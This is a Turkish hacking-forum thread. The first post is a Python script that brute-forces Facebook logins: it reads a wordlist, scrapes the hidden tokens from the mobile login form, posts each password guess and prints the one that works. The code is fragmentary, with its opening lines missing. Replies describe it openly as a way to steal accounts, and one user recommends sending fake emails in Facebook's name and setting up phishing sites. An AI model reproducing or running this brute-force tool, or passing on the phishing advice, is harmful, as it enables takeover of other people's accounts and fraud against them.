Onaylı Üye
import requests
from bs4 import BeautifulSoup
Wordlist Patch>> ") #Wordlist Dosyasının Adını İstedik.(Bu Oluşturduğumuz Python Dosyası İle Aynı Yerde Olması Laızm)
File = open(Patch, "r") #İsimini Verdiğimiz Wordlist Dosyasını Okuduk
for Password in File: #Wordlist`in İçindekileri Password Adında Bir Değişkene Atadık
Password = Password.strip() #Gereksiz Boşlukları Kaldırdık
Payload = {
"email":Email,
"pass":Password,
"login":"Giriş+Yap"
}
#Burada Facebookun Öğreyi İnceleden Edindiğimiz Bilgileri Yazdırdık
Url = "https://m.facebook.com/login/"#Sayfamızı Belirttik
R = requests.get(Url)#Requests Moduülü Sayesinde Sayfanın HTML Kodunu Çektik
Soup = BeautifulSoup(R.content, "html5lib") #BeautifulSoup İle Sayfanın HTML Kodlarını html5lib Formatıyla Okumusanı Ayarladık
Agent = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"} #Requests Modulunun Bu Yani İnternetten Tarayıcısı İle Gir Dedik
Payload["lsd"] = Soup.find(attrs={"name":"lsd"})["value"]#Burada Her Facebook`a Girdiğimizde Değişen Özelliklerin Valuesinin Yani Değerini Çektik Bunlar Olmadan Giriş Yapamayız
Payload["jazoest"] = Soup.find(attrs={"name":"jazoest"})["value"]
Payload["m_ts"] = Soup.find(attrs={"name":"m_ts"})["value"]
Payload["li"] = Soup.find(attrs={"name":"li"})["value"]
Payload["try_number"] = Soup.find(attrs={"name":"try_number"})["value"]
Payload["unrecognized_tries"] = Soup.find(attrs={"name":"unrecognized_tries"})["value"]
#Valueleri Çektik, Ve Payloada Ekledik
R = requests.post(Url,data=Payload, headers=Agent)#R Değişkenine requests Modluünün Sayfaya Girmesini Ve data=Payload Kısmıda Ne Yapacağını Ayarladık Ve Nasıl Hangi Ayarda Girceğini headers=Agent Sayesinde Ayarladık
if "Şifreni mi Unuttun?" in R.text: #Eğer R.text HTML Kodunda Şifreni mi Unuttun? Var İse Şifrenin Hatalı Olduğnu Ekrana Bastırdık
print("[-] Password Not Found>> "+Password)#Ekrana Yalnış Şifreyi Bastırdık.
else:#Eğer Yoksa Durumu
print("[+] Password Found>> "+Password)#Doğru Şifreki Ekrana Bastırdık
break#Burda İse Şifreyi Bulduğumuz İçin Diyer Şifreleri Denememsi Gerektiği İçin Programı Durdurduk.
bu bruteforce ne oluyor tam anlamadım reis
Teşekkürler Reis Yani Hesap Çalmak Gibi Bişeymifacebooka gidip hedef kullanıcının hesabına giriş yapmak için şifre deniyor
Teşekkürler Reis Yani Hesap Çalmak Gibi Bişeymi
evet hesabı çalmak için şifre deniyor bulduğunu sana diyorda ölme eşeğim ölme işi biraz bu
Ata Sözü Çok İyiymiş Kullanıcam Reis si<löfşdsöfsldf
diyorda ölme eşeğ
Zaten Gösterme Amacım Bilgi Olsun Diye. Brute İle Hesap Çalmakevet hesabı çalmak için şifre deniyor bulduğunu sana diyorda ölme eşeğim ölme işi biraz bu
Zaten Gösterme Amacım Bilgi Olsun Diye. Brute İle Hesap Çalmakİmkansız Gibi Bişey
Aynenİmkansızdanda öteAma yinede kodları farklı sitelerde kullanabilirler önemli olan kodları anlamaları tabiki
You Use raw_input Not input or int(input)dose its work on kalilinux
O taktiği Bi Aralar Kullanıyodum Ama Bıraktım Belki Başlarım GeriKullan kardeşimBu arada birinin hesabını almaya niyetin varsa fake e postlar gönder facebook adına pishing site kur ozaman %99 hacklersin
Brute İle Şİfre Kırmak PuffO taktiği Bi Aralar Kullanıyodum Ama Bıraktım Belki Başlarım Geri
Brute İle Yi Demiyorum KankaBrute İle Şİfre Kırmak PuffEskide Kaldı Çok Zor O Yöntem.En İyisi Sosyal Mühendislik Ya Da Phising
Sornaısnda Farkettim Knk BendeBrute İle Yi Demiyorum Kanka
Haklısın Kanka :D[/B]
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?